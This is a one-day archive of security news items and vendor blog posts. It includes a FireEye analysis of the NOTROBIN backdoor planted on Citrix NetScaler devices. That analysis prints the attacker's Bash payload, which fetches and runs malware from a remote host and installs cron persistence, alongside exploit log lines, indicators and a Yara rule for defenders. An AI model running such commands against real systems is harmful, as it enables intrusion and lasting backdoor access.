Daily Archives: January 16, 2020

IoT cybersecurity’s worst kept secret

By improving access to data and taking advantage of them in fundamentally different ways to drive profitability, IT security executives are rapidly changing perceptions of their office. Although making better sense of and use of data may be standard fare in other areas of the enterprise, who knew that modern IoT cybersecurity solutions would become network security’s newest professional lever? Actually, we should have seen it coming, because digital transformation always starts with visibility and … More

The post IoT cybersecurity’s worst kept secret appeared first on Help Net Security.

New infosec products of the week: January 17, 2020

Masergy Shadow IT Discovery: Automatically identify unauthorized SaaS applications Masergy Shadow IT Discovery immediately scans and identifies all applications, providing clients visibility through the SD-WAN management portal. Until now, IT departments have had to rely on a variety of endpoint security solutions and guesswork to access this information. The time savings and decreased threat exposure will help IT organizations increase their security posture and keep up with the blind spots created by unsanctioned usage. STEALTHbits … More

The post New infosec products of the week: January 17, 2020 appeared first on Help Net Security.

How to govern cybersecurity risk at the board level

Rapidly evolving cybersecurity threats are now commanding the attention of senior business leaders and boards of directors and are no longer only the concern of IT security professionals. A report from University of California, Berkeley’s Center for Long-Term Cybersecurity (CLTC) and Booz Allen Hamilton uses insights gleaned from board members with over 130 years of board service across nine industry sectors to offer guidance for boards of directors in managing cybersecurity within large global companies. … More

The post How to govern cybersecurity risk at the board level appeared first on Help Net Security.

Worldwide IT spending to total $3.9 trillion in 2020

Worldwide IT spending is projected to total $3.9 trillion in 2020, an increase of 3.4% from 2019, according to the latest forecast by Gartner. Global IT spending is expected to cross into $4 trillion territory next year. “Although political uncertainties pushed the global economy closer to recession, it did not occur in 2019 and is still not the most likely scenario for 2020 and beyond,” said John-David Lovelock, distinguished research vice president at Gartner. “With … More

The post Worldwide IT spending to total $3.9 trillion in 2020 appeared first on Help Net Security.

2020 Trend Alert: Consumer Privacy

Consumer privacy

We are only a few weeks into 2020, and it is safe to say that consumer privacy is all the rage. California kicked off the movement with the California Consumer Privacy Act (CCPA), AB 375, which went into effect on January 1, 2020. The act aims to give consumers more rights to their personal data. Since then, Washington, New Hampshire, and New York have all proposed similar consumer privacy bills that – if passed – will have an effect not only on consumers, but on also on businesses that operate in these states.

Take a look at the bills, then consider the steps your business can take to help comply with the regulations.

California Consumer Privacy Act

The newly established rights allow consumers to request records of what personal data is collected and mandate the deletion or cease the sale of that information. The privacy act also regulates the data collected from minors and prevents businesses from discriminating against consumers that choose to exercise their rights.

Businesses that must adhere to the CCPA are those that collect personal data, conduct business in California, and fit into one or more of the following categories:

  • Gross annual revenue over $25 million
  • Buys, sells, or obtains the personal data of more than 50,000 consumers, devices, or households
  • Makes over 50 percent of its revenue from selling consumers’ data. 

To further empower consumers, CCPA has also mandated data brokers to register with the Attorney General, providing information about who they are and what their collection practices entail. This information is loaded into a database and is accessible to all consumers. 

Washington Privacy Act

On January 13, 2020, Washington State Senator, Reuven Carlyle, introduced the bill for the Washington Privacy Act (WPA), SB 5376. If granted, the bill will allow residents to see who is accessing their personal data, correct or delete data, or opt-out of targeted advertisements and profiling. Controllers will need to conduct data protection assessments regarding where they are processing personal data and additional assessments anytime there is a change to the processing that could affect consumers. The bill will also require companies to disclose data management policies to increase transparency and establish limits on the use of facial recognition technology.

New Hampshire Privacy Act

Garrett Muscatel and Greg Indruk, U.S. State Representatives, reintroduced the bill for the Act Relative to the Collection of Personal Information by Businesses, HB 1680, to the New Hampshire House of Representatives. The bill, if passed, will give consumers the right to access, transfer, and delete their personal information, or deny the sale of such information. It will also give consumers the right to take action if their information is leaked. Like CCPA, the bill would apply to any legal entity that has annual gross revenues over $25,000,000, processes data of more than 50,000 New Hampshire consumers, or derives 50 percent of its revenue from selling personal information.

New York Privacy Act

The New York Privacy Act, SB 5642, was sent to the Senate Standing Committee on Consumer Protection on January 8, 2020. If approved, the bill will improve transparency, add protection, and allow for action against personal data. Personal data will include biometric information and internet or electric network activity.

What steps can you take to protect your clients and your business?

These regulations, and others, like the EU GDPR, signal that protecting and securing consumer data will increasingly be required, and application security plays a role in that requirement. Whether you are looking to expand your application security (AppSec) program to further comply with the new regulations, or you are looking to start your first AppSec program, we can help. Our Veracode Verified program gives you a clear AppSec roadmap to follow, helping to ensure that security is weaved into your development process.

In addition, by participating in the program, you can earn a Veracode Verified seal, which demonstrates to customers that you are dedicated to securing your applications and protecting their personal data.

Contact us today to learn how to better secure your applications to comply with industry standards.

SecureLink simplifies vendors privileged access management for healthcare organizations

SecureLink, the leader in vendor privileged access management (VPAM), released SecureLink for Healthcare to provide hospitals and healthcare organizations a centralized solution for managing privileged access for third-party vendors. It is customized to meet the needs of organizations operating under HIPAA and HITECH regulations and gives network administrators the ability to limit access to specific systems and applications, while providing a full video audit and keystroke logging of sessions. As part of the offering, SecureLink … More

The post SecureLink simplifies vendors privileged access management for healthcare organizations appeared first on Help Net Security.

Cloudflare for Campaigns protects political campaigns against cyberattacks and election interference

Cloudflare, the security, performance, and reliability company helping to build a better Internet, announced it will be offering free security services to help political campaigns in the United States and around the world defend against cyberattacks and election interference. The Cloudflare for Campaigns program will allow any eligible campaign to access a variety of the company’s security services including enhanced firewall protection, denial-of-service (DDoS) attack mitigation, as well as internal data management and security controls. … More

The post Cloudflare for Campaigns protects political campaigns against cyberattacks and election interference appeared first on Help Net Security.

DataVisor dEdge: Uncover known and unknown attacks early

DataVisor announced the availability of dEdge, an anti-fraud solution that detects malicious devices in real-time, empowering organizations to uncover known and unknown attacks early, and take action with confidence. Fraud detection today spans multiple vectors. With growing adoption of mobile devices and the emergence of the always-on economy, by many measures, when organizations realize that they have been subject to a cyber-attack, it is already too late. Modern fraud detection and prevention require a transformational … More

The post DataVisor dEdge: Uncover known and unknown attacks early appeared first on Help Net Security.

CloudNine Collection Manager: Data extraction solution for Office 365 emails and OneDrive files

CloudNine launches CloudNine Collection Manager, a breakthrough data extraction solution from the global electronic discovery technology provider. Installed in minutes, Collection Manager defensibly performs native data collections from Office 365 (O365) email custodians, as well as Microsoft OneDrive cloud storage files. Collection Manager is easy enough for first-time collectors, yet powerful enough for discovery professionals. Collection Manager quickly and securely connects to O365 and OneDrive data sources, including documents linked from email messages, which few … More

The post CloudNine Collection Manager: Data extraction solution for Office 365 emails and OneDrive files appeared first on Help Net Security.

404 Exploit Not Found: Vigilante Deploying Mitigation for Citrix NetScaler Vulnerability While Maintaining Backdoor

As noted in Rough Patch: I Promise It'll Be 200 OK, our FireEye Mandiant Incident Response team has been hard at work responding to intrusions stemming from the exploitation of CVE-2019-19781. After analyzing dozens of successful exploitation attempts against Citrix ADCs that did not have the Citrix mitigation steps implemented, we’ve recognized multiple groups of post-exploitation activity. Within these, something caught our eye: one particular threat actor that’s been deploying a previously-unseen payload for which we’ve created the code family NOTROBIN.

Upon gaining access to a vulnerable NetScaler device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign.

Initial Compromise

This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device. They issue an HTTP POST request from a Tor exit node to transmit the payload to the vulnerable newbm.pl CGI script. For example, Figure 1 shows a web server access log entry recording exploitation:

127.0.0.2 - - [12/Jan/2020:21:55:19 -0500] "POST
/vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 304 - "-" "curl/7.67.0"

Figure 1: Web log showing exploitation

Unlike other actors, this actor appears to exploit devices using a single HTTP POST request that results in an HTTP 304 response—there is no observed HTTP GET to invoke staged commands. Unfortunately, we haven’t recovered the POST body contents to see how it works.  In any case, exploitation causes the Bash one liner shown in Figure 2 to run on the compromised system:

pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k
hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o
/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * *
/var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

Figure 2: Bash exploit payload

This is the same methodology as described in Rough Patch: I Promise It'll Be 200 OK. The effects of this series of commands includes:

  1. Kill and delete all running instances of netscalerd—a common process name used for cryptocurrency mining utilities deployed to NetScaler devices.
  2. Creates a hidden staging directory /tmp/.init, download NOTROBIN to it, and enable the execute permission.
  3. Install /var/nstmp/.nscache/httpd for persistence via the cron daemon. This is the path to which NOTROBIN will copy itself.
  4. Manually execute NOTROBIN.

There’s a lot to unpack here. Of note, the actor removes malware known to target NetScaler devices via the CVE-2019-19781 vulnerability. Cryptocurrency miners are generally easy to identify—just look for the process utilizing nearly 100% of the CPU. By uninstalling these unwanted utilities, the actor may hope that administrators overlook an obvious compromise of their NetScaler devices.

The actor uses curl to fetch NOTROBIN from the hosting server with IP address 95.179.163[.]186 that appears to be an abandoned WordPress site. FireEye has identified many payloads hosted on this server, each named after their embedded authentication key. Interestingly, we haven’t seen reuse of the same payload across multiple clients. Compartmenting payloads indicates the actor is exercising operational security.

FireEye has recovered cron syslog entries, such as those shown in Figure 3, that confirm the persistent installation of NOTROBIN. Note that these entries appear just after the initial compromise. This is a robust indicator of compromise to triage NetScaler devices.

Jan 12 21:57:00 <cron.info> foo.netscaler /usr/sbin/cron[73531]:
(nobody) CMD (/var/nstmp/.nscache/httpd)

Figure 3: cron log entry showing NOTROBIN execution

Now, let’s turn our attention to what NOTROBIN does.

Analysis of NOTROBIN

NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

When executed, NOTROBIN ensures that it is running from the path /var/nstmp/.nscache/httpd. If not, the utility copies itself to this path, spawns the new copy, and then exits itself. This provides detection cover by migrating the process from /tmp/, a suspicious place for long-running processes to execute, to an apparently NetScaler-related, hidden directory.

Now the fun begins: it spawns two routines that periodically check for and delete exploits.

Every second, NOTROBIN searches the directory /netscaler/portal/scripts/ for entries created within the last 14 days and deletes them, unless the filename or file content contains a hardcoded key (example: 64d4c2d3ee56af4f4ca8171556d50faa). Open source reporting indicates that some actors write scripts into this directory after exploiting CVE-2019-19781. Therefore, we believe that this routine cleans the system of publicly known payloads, such as PersonalBookmark.pl.

Eight times per second, NOTROBIN searches for files with an .xml extension in the directory /netscaler/portal/templates/. This is the directory into which exploits for CVE-2019-19781 write templates containing attacker commands. NOTROBIN deletes files that contain either of the strings block or BLOCK, which likely match potential exploit code, such as that found in the ProjectZeroIndia exploit; however, the utility does not delete files with a filename containing the secret key.

FireEye believes that actors deploy NOTROBIN to block exploitation of the CVE-2019-19781 vulnerability while maintaining backdoor access to compromised NetScaler devices. The mitigation works by deleting staged exploit code found within NetScaler templates before it can be invoked. However, when the actor provides the hardcoded key during subsequent exploitation, NOTROBIN does not remove the payload. This lets the actor regain access to the vulnerable device at a later time.

Across multiple investigations, FireEye observed actors deploying NOTROBIN with unique keys. For example, we’ve recovered nearly 100 keys from different binaries. These look like MD5 hashes, though FireEye has been unsuccessful in recovering any plaintext. Using complex, unique keys makes it difficult for third parties, such as competing attackers or FireEye, to easily scan for NetScaler devices “protected” by NOTROBIN. This actor follows a strong password policy!

Based on strings found within NOTROBIN, the actor appears to inject the key into the Go project using source code files named after the key. Figure 4 and Figure 5 show examples of these filenames.

/tmp/b/.tmpl_ci/64d4c2d3ee56af4f4ca8171556d50faa.go

Figure 4: Source filename recovered from NOTROBIN sample

/root/backup/sources/d474a8de77902851f96a3b7aa2dcbb8e.go

Figure 5: Source filename recovered from NOTROBIN sample

We wonder if “tmpl_ci” refers to a Continuous Integration setup that applies source code templating to inject keys and build NOTROBIN variants. We also hope the actor didn’t have to revert to backups after losing the original source!

Outstanding Questions

NOTROBIN spawns a background routine that listens on UDP port 18634 and receives data; however, it drops the data without inspecting it. You can see this logic in Figure 6. FireEye has not uncovered a purpose for this behavior, though DCSO makes a strong case for this being used as a mutex, as only a single listener can be active on this port.


Figure 6: NOTROBIN logic that drops UDP traffic

There is also an empty function main.install_cron whose implementation has been removed, so alternatively, perhaps these are vestiges of an early version of NOTROBIN. In any case, a NetScaler device listening on UDP port 18634 is a reliable indicator of compromise. Figure 7 shows an example of listing the open file handles on a compromised NetScaler device, including a port listening on UDP 18634.


Figure 7: File handling listing of compromised NetScaler device

NOTROBIN Efficacy

During one engagement, FireEye reviewed forensic evidence of NetScaler exploitation attempts against a single device, both before and after NOTROBIN was deployed by an actor. Prior to January 12, before NOTROBIN was installed, we identified successful attacks from multiple actors. But, across the following three days, more than a dozen exploitation attempts were thwarted by NOTROBIN. In other words, NOTROBIN inoculated the vulnerable device from further compromise. For example, Figure 8 shows a log message that records a failed exploitation attempt.

127.0.0.2 - - [13/Jan/2020:05:09:07 -0500] "GET
/vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1" 404 48 "-"
"curl/7.47.0"

Figure 8: Web log entry showing a failed exploitation attempt

Note that the application server responded with HTTP 404 (“Not Found”) as this actor attempts to invoke their payload staged in the template wTyaINaDVPaw8rmh.xml. NOTROBIN deleted the malicious template shortly after it was created – and before it could be used by the other actor.

FireEye has not yet identified if the actor has returned to NOTROBIN backdoors.

Conclusion

FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators that check into their devices after reading Citrix security bulletin CTX267027. NOTROBIN mitigates CVE-2019-19781 on compromised devices but retains a backdoor for an actor with a secret key. While we haven’t seen the actor return, we’re skeptical that they will remain a Robin Hood character protecting the internet from the shadows.

Indicators of Compromise and Discovery

Table 1 lists indicators that match NOTROBIN variants that FireEye has identified. The domain vilarunners[.]cat is the WordPress site that hosted NOTROBIN payloads. The domain resolved to 95.179.163[.]186 during the time of observed activity. As of January 15, the vilarunners[.]cat domain currently resolves to a new IP address of 80.240.31[.]218.

IOC Item

Value

HTTP URL prefix

hxxps://95[.]179.163.186/wp-content/uploads/2018/09/

Directory

/var/nstmp/.nscache

Filename

/var/nstmp/.nscache/httpd

Directory

/tmp/.init

Filename

/tmp/.init/httpd

Crontab entry

/var/nstmp/.nscache/httpd

Listening UDP port

18634

Remote IP

95.179.163[.]186

Remote IP

80.240.31[.]218

Domain

vilarunners[.]cat

Table 1: Indicators of Compromise

Discovery on VirusTotal

You can use the following VTI queries to identify NOTROBIN variants on VirusTotal:

  • vhash:"73cee1e8e1c3265c8f836516c53ae042"
  • vhash:"e57a7713cdf89a2f72c6526549d22987"

Note, the vHash implementation is private, so we’re not able to confirm why this technique works. In practice, the vHashes cover the same variants identified by the Yara rule listed in Figure 9.

rule NOTROBIN

{

    meta:

        author = "william.ballenthin@fireeye.com"

        date_created = "2020-01-15"

    strings:

        $func_name_1 = "main.remove_bds"

        $func_name_2 = "main.xrun"

    condition:

        all of them

}

Figure 9: Yara rule that matches on NOTROBIN variants

Recovered Authentication Keys

FireEye has identified nearly 100 hardcoded keys from NOTROBIN variants that the actor could use to re-enter compromised environments. We expect that these strings may be found within subsequent exploitation attempts, either as filenames or payload content. Although we won’t publish them here out of concern for our customers, please reach out if you’re looking for NOTROBIN within your environment and we can provide a list.

Acknowledgements

Thank you to analysts across FireEye that are currently responding to this activity, including Brandan Schondorfer for collecting and interpreting artifacts, Steven Miller for coordinating analysis, Evan Reese for pivoting across intel leads, Chris Glyer for reviewing technical aspects, Moritz Raabe for reverse engineering NOTROBIN samples, and Ashley Frazer for refining the presentation and conclusions.

Micro Focus AD Bridge 2.0: Extending security policies and access controls to cloud-based Linux

Micro Focus released Micro Focus AD Bridge 2.0, offering IT administrators the ability to extend Active Directory (AD) controls from on-premises resources, including Windows and Linux devices to the cloud – a solution not previously offered in the marketplace. With AD Bridge 2.0, organizations can leverage existing infrastructure authentication, security as well as policy, in order to simplify the migration of on-premises Linux Active Directory to the cloud, resulting in fully secured and managed Linux … More

The post Micro Focus AD Bridge 2.0: Extending security policies and access controls to cloud-based Linux appeared first on Help Net Security.

52 hackers participate in ninth U.S. Department of Defense and HackerOne bug bounty program

Through partnership with the Defense Digital Service, the U.S. Department of Defense (DoD) and HackerOne, the number one hacker-powered pentesting and bug bounty platform, announced the results of the second Army bug bounty program, ‘Hack the Army 2.0’. The bug bounty challenge ran from October 9, 2019 to November 15, 2019 with more than 60 publicly accessible web assets, including *.army.mil, *.goarmy.mil, and the Arlington Cemetery website for the first time. Bug bounties are monetary … More

The post 52 hackers participate in ninth U.S. Department of Defense and HackerOne bug bounty program appeared first on Help Net Security.

Visa invests in VGS to accelerate fintech innovation while advancing data security

Very Good Security (VGS), a leader in modern data security and custodianship, announced that it has received a strategic investment from Visa to expand access to VGS’ infrastructure-as-a-service for financial technology companies (fintechs) and large enterprises. Visa joins other notable investors, including Goldman Sachs, Andreessen Horowitz, Vertex Ventures US, and Max Levchin (co-founder of PayPal), in advancing VGS’ mission to provide a better approach to data security, privacy and compliance. Earlier this year, Visa selected … More

The post Visa invests in VGS to accelerate fintech innovation while advancing data security appeared first on Help Net Security.

Tricentis acquires SpecFlow to extend support for the open source community

Tricentis, the leader in continuous testing for DevOps, announced that it has acquired SpecFlow, the biggest and most trusted BDD solution for .NET developers around the world. SpecFlow’s pragmatic approach to specification-by-example has helped agile development teams improve collaboration with business stakeholders to build and deliver higher quality software. SpecFlow will continue to remain a free, open source offering for the software development and testing communities. SpecFlow+, SpecFlow’s commercial offering, and SpecMap, an Azure DevOps … More

The post Tricentis acquires SpecFlow to extend support for the open source community appeared first on Help Net Security.

CyberLink integrates facial recognition engine into VIVOTEK’s IP surveillance solutions

VIVOTEK, the global leading IP surveillance solution provider, and CyberLink, a pioneer of AI and facial recognition technologies, announced they have entered into a strategic partnership, which will integrate CyberLink’s FaceMe AI facial recognition engine into VIVOTEK’s IP surveillance solutions. “Founded in 2000, VIVOTEK has been dedicated to the IP surveillance industry for 20 years. Entering the era of AIoT, we will continue global partnerships to accelerate and enhance video applications by joining forces with … More

The post CyberLink integrates facial recognition engine into VIVOTEK’s IP surveillance solutions appeared first on Help Net Security.

White Ops appoints Rhushabh ‘Rush’ Mehta as Sr. VP of Engineering

White Ops, the global leader in bot mitigation verifying the humanity of more than 1 trillion digital interactions per week, announced the appointment of Rhushabh ‘Rush’ Mehta, former Head of Foundational Technology at Audible, an Amazon Company, to White Ops Sr. Vice President of Engineering. In his new role, Rush will lead White Ops’ development efforts to further accelerate the innovation of the White Ops Bot Mitigation platform and associated products including White Ops Advertising … More

The post White Ops appoints Rhushabh ‘Rush’ Mehta as Sr. VP of Engineering appeared first on Help Net Security.

Kathy Crusco joins Code42’s board of directors

Code42, the leader in insider threat detection and response, announced the appointment of Kathy Crusco to its board of directors. An enterprise software veteran, she currently serves on the board of directors at QAD, Poly (formerly Plantronics and Polycom), and Calix, and most recently served as chief financial officer at Kony, a cloud-based digital banking application and low-code platform solutions company. “We are pleased to welcome Kathy to Code42’s board of directors,” said Joe Payne, … More

The post Kathy Crusco joins Code42’s board of directors appeared first on Help Net Security.

The Basics of IGA ROI: How to Show Value in Identity Governance

Undefined

Like most companies today, your business is likely facing increasing demands to support and protect more devices and systems that contain data critical to your business. You are spending increasing time and resources on manual, repetitive tasks for managing user accounts. And you are being squeezed by the business to do more with less.

What you need is a way to prove how investing in intelligent identity governance and administration (IGA) solutions brings value to your business and enables you to manage the identity chaos you face each day. Identity governance may be one of the smartest selections your team makes to address these challenges, so where do you start?

Let’s take a look at five foundational elements required for building the business case for identity governance, and for showing the value and ROI of identity governance solutions for your business.  
 

1) Understand the Impact to Cost, Compliance, and Risk Reduction

When it comes to showing the value of identity governance in your business, you need to demonstrate how your investment will impact three critical areas—cost, compliance, and risk reduction. Organizations that leverage leading identity governance and administration solutions, like those offered from Core Security, have realized the business benefits of investing in these solutions and the value they bring in:

  • Increasing efficiencies and reducing IT and business costs
  • Enhancing compliance, review, and certification processes
  • Improving security and mitigating risks

Incorporating these three elements in your business case requires research. Do your homework and take time to identify the financial impact and expected efficiencies gained from the investment. Clearly spell out how you can better meet compliance and industry standards. And while more difficult to quantify, try to articulate the value in mitigating risk across your organization.
 

2) Define the Specific Challenges You Want to Solve

It’s essential that you know the current state of your organization’s most pressing challenges with regard to identity governance and access management. This means clearly articulating the challenges you face today in relation to your own business and identifying the problems you are trying to address. Make sure you specifically can identify:

  • Who currently owns each process
  • What systems, users, and applications are involved
  • Where the greatest adverse impact is occurring
  • When and how long the challenges have been known
  • Why they present a major roadblock to your business

Once you have identified the most critical areas of your identity governance challenges, you need to draft a problem summary statement in a concise, succinct manner that quantifies the costs associated with your current issues. This statement should also take into account any gaps that exist from both a compliance perspective and risk perspective, identifying any potential implications that would result from not addressing these gaps.

Your description of this challenge should define the total resources required to support the initiative, including the number of full-time employees required, the number of users supported overall, and the total number of hours required to manage this process over a specific length of time. From a compliance perspective, you may have clear requirements that you must address from either an internal or external audit, so it’s important to identify those specifically. From a risk angle, you will want to consider the balance that exists between user efficiency and overall risk to the organization.
 

3) Articulate and Analyze Your Solution Approach

The next step for building a business case for identity governance is to fully research and identify the IGA solutions that will best meet your needs. Many leading organizations today conclude that a commercial-off-the-shelf (COTS) solution is best suited for their needs and recognize that these solutions are widely used by many organizations across their industry.

Once you have identified the type of automated identity governance solutions your organization requires to address your top access-related challenges, it is time to articulate your solution approach. Highlighting your solution approach statement involves providing an analysis of the overall costs associated with the new investment, identifying specifically what the solution will solve, the cost savings it will derive, and the project return on investment and overall payback period length. It should also include an analysis of how the solution will better meet regulatory compliance and describe how the solution can more effectively address the balance between overall risk and usability. Also be sure to specify when the recommended investment should begin upon approval and include key considerations for the investment.
 

4) Show, Don’t Just Tell

Showing the value of identity governance and overall ROI means you should take time to detail your calculations through graphs, tables, and charts where possible. Provide specific cost models, summary comparisons, and other figures that reinforce the statements you are drafting as part of your business case. Typically, this includes existing and proposed IT-related access costs, business-related access costs, total costs of access-related expenses, and proposed cost savings when the proposed identity governance solution is in effect. Showing how you can save the business time, money, and resources through tables and graphs is an ideal way to get your point across quickly and effectively.  
 

5) Back Up Your Recommendation

After your extensive analysis and evaluation, you must clearly state your recommendation with additional proof points to substantiate your decision. This means identifying the recommended partner, specifying the relevant solutions for investment, and providing a summary comparison of your current state versus the leading solution candidate. Showing the effects of the status quo versus the leading solution candidate will clearly reveal the results of your analysis. Providing a breakeven period and cumulative savings will further reinforce the value that your IGA solution will provide to the business.
 

It's Time to Build Your Case

Your organization can’t afford to put off such a critical investment. But leveraging an intelligent identity governance solution that mitigates risk and manages the complexity of your access challenges requires you to take the first step. Remember, an effective business case shows the value of the solution by directly correlating the outcomes of investment with benefits to the business from a cost, compliance, and risk perspective. Do the hard work required so you can show the ROI of identity governance even before you make the investment.  
 

cs-value-roi-identity-governance-blog-700x350.jpg

value-roi-identity-governance
Identity and Access Management
Big text: 
Blog
Resource type: 
Blogs
Ready to get started in building your business case for identity governance?

Download our guide that provides step-by-step instructions and examples for making the case for identity governance in your organization. 

Windows Vulnerability: Researchers Demonstrate Exploits

'Proof of Concept' Code Released; Patching Urged
A day after the NSA disclosed a significant vulnerability that could affect the cryptographic operations in some versions of Windows, security researchers started releasing "proof of concept" code designed to show how attackers potentially could exploit the flaw. This highlights the urgency of patching.

Get in the Security Fast Lane with a Stealthwatch and Encrypted Traffic Analytics Test Drive!

As businesses continue to move towards a more digital future, the threats they face continue to become more complex. As many organizations continue to embrace the benefits of cloud, IoT, and an increasingly mobile workforce, threat actors are taking advantage of these attack vectors to work their way into your business.

Cisco Stealthwatch provides comprehensive network-wide visibility and security analytics, so you can stay ahead of attackers and expose their locations and behaviors to help you prevent a security event from becoming a full-blown breach. Today, we’re happy to announce that you’ll have the chance to get behind the wheel and give Stealthwatch a live test drive!

Before they become customers, many organizations we work with have never experienced what it’s like to gain insight into their networks and how they might use the power of behavioral analytics and machine learning to detect threats. Fortunately, Stealthwatch test drives are the perfect way to gain first-hand experience with Stealthwatch and how you can use its capabilities to do just that.

Here’s an example of what customers find on their networks;

The Cisco Stealthwatch Test Drive provides users with access to a fully configured environment with traffic that you generate to test first hand live use cases including:

  • Breach Detection
  • Insider and Advanced Threat Detection
  • High Risk Application Detection
  • Policy Violations
  • Encrypted Traffic Analytics

Attendees will get to experience life-like cyber security attack situations in a virtualized lab environment, playing the role of both attacker and defender. Operating in an environment similar to many large, complex networks, you will learn how an environment can become compromised, how security breaches are detected, and how to respond to these threats using Stealthwatch. Completing these labs will provide you with test plans to effectively operationalize Stealthwatch.

Whether you’re new to Stealthwatch and interested in trying the product for the first time, or a long-time customer, the Cisco Stealthwatch Test Drive Labs are a great way to see all of the detections and integrations that Stealthwatch can do for your organization and help you tailor your product experience to your network and security needs.

See a schedule of upcoming Cisco Stealthwatch Test Drive Labs.

To learn more about Stealthwatch, please visit: https://www.cisco.com/go/stealthwatch

 

The post Get in the Security Fast Lane with a Stealthwatch and Encrypted Traffic Analytics Test Drive! appeared first on Cisco Blogs.

JhoneRAT: Cloud based python RAT targeting Middle Eastern countries

Today, Cisco Talos is unveiling the details of a new RAT we have identified we’re calling “JhoneRAT.” This new RAT is dropped to the victims via malicious Microsoft Office documents. The dropper, along with the Python RAT, attempts to gather information on the victim’s machine and then uses multiple cloud services: Google Drive, Twitter, ImgBB and Google Forms. The RAT attempts to download additional payloads and upload the information gathered during the reconnaissance phase. This particular RAT attempts to target a very specific set of Arabic-speaking countries. The filtering is performed by checking the keyboard layout of the infected systems. Based on the analyzed sample, JhoneRAT targets Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.

For more, read the rest on the Talos blog here.

The post JhoneRAT: Cloud based python RAT targeting Middle Eastern countries appeared first on Cisco Blogs.

Microsoft commits to carbon negative by 2030, among other environmental commitments

The environmental crisis is by no means a new issue, but Microsoft is making a renewed effort to combat it, as it announced today that it is committing to becoming carbon negative by 2030, eliminating all past carbon emissions by 2050, and the creation of a $US1 billion fund for investment in carbon removal technologies.

Congress Hears Warnings of Iranian Cyberthreats

Experts Tell House Committee Federal Agencies Must Shore Up Defenses
Iranian-led disinformation campaigns and other cyberthreats against the U.S. are likely to surge in the aftermath of Iranian Major General Qasem Soleimani's death, security and political experts told a House committee Wednesday. That's why federal agencies need to shore up their defenses.

Broadening the Scope: A Comprehensive View of Pen Testing

Penetration tests have long been known as a critical security tool that exposes security weaknesses through simulated attacks on an organization's IT environments. These test results can help prioritize weaknesses, providing a road-map towards remediation. However, the results are also capable of doing even more. They identify and quantify security risk, and can be used as a keystone in

Changing the monolith—Part 2: Whose support do you need?

In Changing the monolith—Part 1: Building alliances for a secure culture, I explored how security leaders can build alliances and why a commitment to change must be signaled from the top. But whose support should you recruit in the first place? In Part 2, I address considerations for the cybersecurity team itself, the organization’s business leaders, and the employees whose buy-in is critical.

Build the right cybersecurity team

It could be debated that the concept of a “deep generalist” is an oxymoron. The analogy I frequently find myself making is you would never ask a dermatologist to perform a hip replacement. A hip replacement is best left to an orthopedic surgeon who has many hours of hands-on experience performing hip replacements. This does not lessen the importance of the dermatologist, who can quickly identify and treat potentially lethal diseases such as skin cancer.

Similarly, not every cybersecurity and privacy professional is deep in all subjects such as governance, technology, law, organizational dynamics, and emotional intelligence. No person is born a specialist.

If you are looking for someone who is excellent at threat prevention, detection, and incident response, hire someone who specializes in those specific tasks and has demonstrated experience and competency. Likewise, be cautious of promoting cybersecurity architects to the role of Chief Information Security Officer (CISO) if they have not demonstrated strategic leadership with the social aptitude to connect with other senior leaders in the organization. CISOs, after all, are not technology champions as much as they are business leaders.

Keep business leaders in the conversation

Leaders can enhance their organizations’ security stance by sending a top-down message across all business units that “security begins with me.” One way to send this message is to regularly brief the executive team and the board on cybersecurity and privacy risks.

Image of three coworkers working at a desk in an office.

Keep business leaders accountable about security.

These should not be product status reports, but briefings on key performance indicators (KPI) of risk. Business leaders must inform what the organization considers to be its top risks.

Here are three ways to guide these conversations:

  1. Evaluate the existing cyber-incident response plan within the context of the overall organization’s business continuity plan. Elevate cyber-incident response plans to account for major outages, severe weather, civil unrest, and epidemics—which all place similar, if not identical, stresses to the business. Ask leadership what they believe the “crown jewels” to be, so you can prioritize your approach to data protection. The team responsible for identifying the “crown jewels” should include senior management from the lines of businesses and administrative functions.
  2. Review the cybersecurity budget with a business case and a strategy in mind. Many times, security budgets take a backseat to other IT or business priorities, resulting in companies being unprepared to deal with risks and attacks. An annual review of cybersecurity budgets tied to what looks like a “good fit” for the organization is recommended.
  3. Reevaluate cyber insurance on an annual basis and revisit its use and requirements for the organization. Ensure that it’s effective against attacks that could be considered “acts of war,” which might otherwise not be covered by the organization’s policy. Review your policy and ask: What happens if the threat actor was a nation state aiming for another nation state, placing your organization in the crossfire?

Gain buy-in through a frictionless user experience

Shadow IT” is a persistent problem when there is no sanctioned way for users to collaborate with the outside world. Similarly, users save and hoard emails when, in response to an overly zealous data retention policy, their emails are deleted after 30 days.

Digital transformation introduces a sea of change in how cybersecurity is implemented. It’s paramount to provide the user with the most frictionless user experience available, adopting mobile-first, cloud-first philosophies.

Ignoring the user experience in your change implementation plan will only lead users to identify clever ways to circumvent frustrating security controls. Look for ways to prioritize the user experience even while meeting security and compliance goals.

Incremental change versus tearing off the band-aid

Imagine slowly replacing the interior and exterior components of your existing vehicle one by one until you have a “new” car. It doesn’t make sense: You still have to drive the car, even while the replacements are being performed!

Similarly, I’ve seen organizations take this approach in implementing change, attempting to create a modern workplace over a long period of time. However, this draws out complex, multi-platform headaches for months and years, leading to user confusion, loss of confidence in IT, and lost productivity. You wouldn’t “purchase” a new car this way; why take this approach for your organization?

Rather than mixing old parts with new parts, you would save money, shop time, and operational (and emotional) complexity by simply trading in your old car for a new one.

